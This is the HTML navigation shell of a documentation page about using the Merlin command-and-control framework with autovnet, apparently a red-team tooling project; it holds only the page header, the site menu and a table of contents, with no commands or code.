
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
        <link rel="canonical" href="https://autovtools.gitlab.io/autovrtfm/usage/pwn/merlin/">
      
      
        <link rel="prev" href="../metasploit/">
      
      
        <link rel="next" href="../sliver/">
      
      
      <link rel="icon" href="../../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.5.3, mkdocs-material-9.4.6">
    
    
      
        <title>merlin - autovnet</title>
      
    
    
      <link rel="stylesheet" href="../../../assets/stylesheets/main.35e1ed30.min.css">
      
        
        <link rel="stylesheet" href="../../../assets/stylesheets/palette.356b1318.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
      <link rel="stylesheet" href="../../../stylesheets/extra.css">
    
    <script>__md_scope=new URL("../../..",location),__md_hash=e=>[...e].reduce((e,_)=>(e<<5)-e+_.charCodeAt(0),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
    
  </head>
  
  
    
    
      
    
    
    
    
    <body dir="ltr" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo">
  
    
    
      <script>var palette=__md_get("__palette");if(palette&&"object"==typeof palette.color)for(var key of Object.keys(palette.color))document.body.setAttribute("data-md-color-"+key,palette.color[key])</script>
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#merlin" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

  

<header class="md-header md-header--shadow md-header--lifted" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="https://gitlab.com/autovtools/autovrtfm/autovnet" title="autovnet" class="md-header__button md-logo" aria-label="autovnet" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54Z"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3V6m0 5h18v2H3v-2m0 5h18v2H3v-2Z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            autovnet
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              merlin
            
          </span>
        </div>
      </div>
    </div>
    
      
        <form class="md-header__option" data-md-component="palette">
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo"  aria-label="Switch to light mode"  type="radio" name="__palette" id="__palette_1">
    
      <label class="md-header__button md-icon" title="Switch to light mode" for="__palette_2" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 7H7a5 5 0 0 0-5 5 5 5 0 0 0 5 5h10a5 5 0 0 0 5-5 5 5 0 0 0-5-5m0 8a3 3 0 0 1-3-3 3 3 0 0 1 3-3 3 3 0 0 1 3 3 3 3 0 0 1-3 3Z"/></svg>
      </label>
    
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo"  aria-label="Switch to dark mode"  type="radio" name="__palette" id="__palette_2">
    
      <label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 6H7c-3.31 0-6 2.69-6 6s2.69 6 6 6h10c3.31 0 6-2.69 6-6s-2.69-6-6-6zm0 10H7c-2.21 0-4-1.79-4-4s1.79-4 4-4h10c2.21 0 4 1.79 4 4s-1.79 4-4 4zM7 9c-1.66 0-3 1.34-3 3s1.34 3 3 3 3-1.34 3-3-1.34-3-3-3z"/></svg>
      </label>
    
  
</form>
      
    
    
    
      <label class="md-header__button md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5Z"/></svg>
      </label>
      <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5Z"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12Z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12 19 6.41Z"/></svg>
        </button>
      </nav>
      
        <div class="md-search__suggest" data-md-component="search-suggest"></div>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
    
    
      <div class="md-header__source">
        <a href="https://gitlab.com/autovtools/autovrtfm/autovnet" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 6.4.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2023 Fonticons, Inc.--><path d="M439.55 236.05 244 40.45a28.87 28.87 0 0 0-40.81 0l-40.66 40.63 51.52 51.52c27.06-9.14 52.68 16.77 43.39 43.68l49.66 49.66c34.23-11.8 61.18 31 35.47 56.69-26.49 26.49-70.21-2.87-56-37.34L240.22 199v121.85c25.3 12.54 22.26 41.85 9.08 55a34.34 34.34 0 0 1-48.55 0c-17.57-17.6-11.07-46.91 11.25-56v-123c-20.8-8.51-24.6-30.74-18.64-45L142.57 101 8.45 235.14a28.86 28.86 0 0 0 0 40.81l195.61 195.6a28.86 28.86 0 0 0 40.8 0l194.69-194.69a28.86 28.86 0 0 0 0-40.81z"/></svg>
  </div>
  <div class="md-source__repository">
    GitLab
  </div>
</a>
      </div>
    
  </nav>
  
    
      
<nav class="md-tabs" aria-label="Tabs" data-md-component="tabs">
  <div class="md-grid">
    <ul class="md-tabs__list">
      
        
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../.." class="md-tabs__link">
          
  
  Home

        </a>
      </li>
    
  

      
        
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../rtfm/" class="md-tabs__link">
          
  
  RTFM

        </a>
      </li>
    
  

      
        
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../demo/" class="md-tabs__link">
          
  
  Demo

        </a>
      </li>
    
  

      
        
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../setup/" class="md-tabs__link">
          
  
  Setup

        </a>
      </li>
    
  

      
        
  
  
    
  
  
    
    
      <li class="md-tabs__item md-tabs__item--active">
        <a href="../../" class="md-tabs__link">
          
  
  Usage

        </a>
      </li>
    
  

      
        
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../help/" class="md-tabs__link">
          
  
  Reference

        </a>
      </li>
    
  

      
        
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../resources/faq/" class="md-tabs__link">
          
  
  Resources

        </a>
      </li>
    
  

      
    </ul>
  </div>
</nav>
    
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


  


  

<nav class="md-nav md-nav--primary md-nav--lifted md-nav--integrated" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="https://gitlab.com/autovtools/autovrtfm/autovnet" title="autovnet" class="md-nav__button md-logo" aria-label="autovnet" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54Z"/></svg>

    </a>
    autovnet
  </label>
  
    <div class="md-nav__source">
      <a href="https://gitlab.com/autovtools/autovrtfm/autovnet" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 6.4.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2023 Fonticons, Inc.--><path d="M439.55 236.05 244 40.45a28.87 28.87 0 0 0-40.81 0l-40.66 40.63 51.52 51.52c27.06-9.14 52.68 16.77 43.39 43.68l49.66 49.66c34.23-11.8 61.18 31 35.47 56.69-26.49 26.49-70.21-2.87-56-37.34L240.22 199v121.85c25.3 12.54 22.26 41.85 9.08 55a34.34 34.34 0 0 1-48.55 0c-17.57-17.6-11.07-46.91 11.25-56v-123c-20.8-8.51-24.6-30.74-18.64-45L142.57 101 8.45 235.14a28.86 28.86 0 0 0 0 40.81l195.61 195.6a28.86 28.86 0 0 0 40.8 0l194.69-194.69a28.86 28.86 0 0 0 0-40.81z"/></svg>
  </div>
  <div class="md-source__repository">
    GitLab
  </div>
</a>
    </div>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--section md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_1" >
        
          
          <label class="md-nav__link" for="__nav_1" id="__nav_1_label" tabindex="">
            
  
  <span class="md-ellipsis">
    Home
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_1_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_1">
            <span class="md-nav__icon md-icon"></span>
            Home
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../.." class="md-nav__link">
        
  
  <span class="md-ellipsis">
    autovnet
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--section md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_2" >
        
          
          <label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="">
            
  
  <span class="md-ellipsis">
    RTFM
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_2">
            <span class="md-nav__icon md-icon"></span>
            RTFM
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../rtfm/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    RTFM
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../rtfm/paradigm/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Paradigm
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../rtfm/autovnet/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    autovnet
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../rtfm/goals/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Goals
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--section md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_3" >
        
          
          <label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="">
            
  
  <span class="md-ellipsis">
    Demo
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_3">
            <span class="md-nav__icon md-icon"></span>
            Demo
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../demo/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Demo
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../demo/proxy/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Proxy
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../demo/callback/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Callback
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--section md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_4" >
        
          
          <label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="">
            
  
  <span class="md-ellipsis">
    Setup
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_4">
            <span class="md-nav__icon md-icon"></span>
            Setup
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../setup/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Quick Start
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../setup/network/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Network Design
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../setup/install/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Install
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../setup/configure/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Configure
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../setup/local/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Local Install
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
    
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--active md-nav__item--section md-nav__item--nested">
      
        
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5" checked>
        
          
          <label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="">
            
  
  <span class="md-ellipsis">
    Usage
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_5_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_5">
            <span class="md-nav__icon md-icon"></span>
            Usage
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Usage
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_5_2" >
        
          
          <label class="md-nav__link" for="__nav_5_2" id="__nav_5_2_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    RDN
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_5_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_5_2">
            <span class="md-nav__icon md-icon"></span>
            RDN
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../rdn/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    RDN
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../rdn/proxy/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Proxy
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../rdn/listen/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Listen
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../rdn/tun/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Tun
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../rdn/dns/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    DNS
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_5_3" >
        
          
          <label class="md-nav__link" for="__nav_5_3" id="__nav_5_3_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    RTFM
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_5_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_5_3">
            <span class="md-nav__icon md-icon"></span>
            RTFM
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../rtfm/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    RTFM
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../rtfm/apt/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    APT
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../rtfm/pasta/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Pasta
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
    
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--active md-nav__item--nested">
      
        
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5_4" checked>
        
          
          <label class="md-nav__link" for="__nav_5_4" id="__nav_5_4_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Pwn
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_5_4_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_5_4">
            <span class="md-nav__icon md-icon"></span>
            Pwn
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    pwn
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../share/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    File Hosting
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../pwncat/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    pwncat
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../winrm/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    evil-winrm
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../metasploit/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    metasploit
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
    
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
      
      
        
      
      
        <label class="md-nav__link md-nav__link--active" for="__toc">
          
  
  <span class="md-ellipsis">
    merlin
  </span>
  

          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <a href="./" class="md-nav__link md-nav__link--active">
        
  
  <span class="md-ellipsis">
    merlin
  </span>
  

      </a>
      
        

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#merlin_1" class="md-nav__link">
    merlin
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#concepts" class="md-nav__link">
    Concepts
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#merlin-autovnet" class="md-nav__link">
    merlin + autovnet
  </a>
  
    <nav class="md-nav" aria-label="merlin + autovnet">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#workflow" class="md-nav__link">
    Workflow
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#container-mounts-merlin-data" class="md-nav__link">
    ⚠ Container Mounts / Merlin Data ⚠
  </a>
  
    <nav class="md-nav" aria-label="⚠ Container Mounts / Merlin Data ⚠">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#mount-location" class="md-nav__link">
    Mount Location
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#examples" class="md-nav__link">
    Examples
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#server" class="md-nav__link">
    server
  </a>
  
    <nav class="md-nav" aria-label="server">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#advanced-topics" class="md-nav__link">
    Advanced Topics
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#merlin-listener" class="md-nav__link">
    merlin listener
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#http2" class="md-nav__link">
    http2
  </a>
  
    <nav class="md-nav" aria-label="http2">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#start-the-server" class="md-nav__link">
    Start the Server
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#configure-listener" class="md-nav__link">
    Configure Listener
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#stage-agent" class="md-nav__link">
    Stage Agent
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#deploy-agent" class="md-nav__link">
    Deploy Agent
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#receive-callback" class="md-nav__link">
    Receive Callback
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#use-the-agent" class="md-nav__link">
    Use the Agent
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#recap" class="md-nav__link">
    Recap
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#http" class="md-nav__link">
    http
  </a>
  
    <nav class="md-nav" aria-label="http">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#start-listener" class="md-nav__link">
    Start Listener
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#start-new-agent" class="md-nav__link">
    Start New Agent
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#h2c" class="md-nav__link">
    h2c
  </a>
  
    <nav class="md-nav" aria-label="h2c">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#start-listener_1" class="md-nav__link">
    Start Listener
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#start-new-agent_1" class="md-nav__link">
    Start New Agent
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#https" class="md-nav__link">
    https
  </a>
  
    <nav class="md-nav" aria-label="https">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#start-new-agent_2" class="md-nav__link">
    Start New Agent
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#http3-quic" class="md-nav__link">
    http3 (QUIC)
  </a>
  
    <nav class="md-nav" aria-label="http3 (QUIC)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#start-listener_2" class="md-nav__link">
    Start Listener
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#start-tun" class="md-nav__link">
    Start Tun
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#start-new-agent_3" class="md-nav__link">
    Start New Agent
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#scripting" class="md-nav__link">
    scripting
  </a>
  
    <nav class="md-nav" aria-label="scripting">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#example" class="md-nav__link">
    Example
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
    </ul>
  
</nav>
      
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../sliver/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    sliver
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../ligolo_ng/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    ligolo-ng
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_5_5" >
        
          
          <label class="md-nav__link" for="__nav_5_5" id="__nav_5_5_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Collaboration
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_5_5_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_5_5">
            <span class="md-nav__icon md-icon"></span>
            Collaboration
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Collaboration
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/svc/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Services
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/fs/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Shared Directories
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/vnc/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Screen Sharing
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/hedgedoc/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Shared Notes
  </span>
  

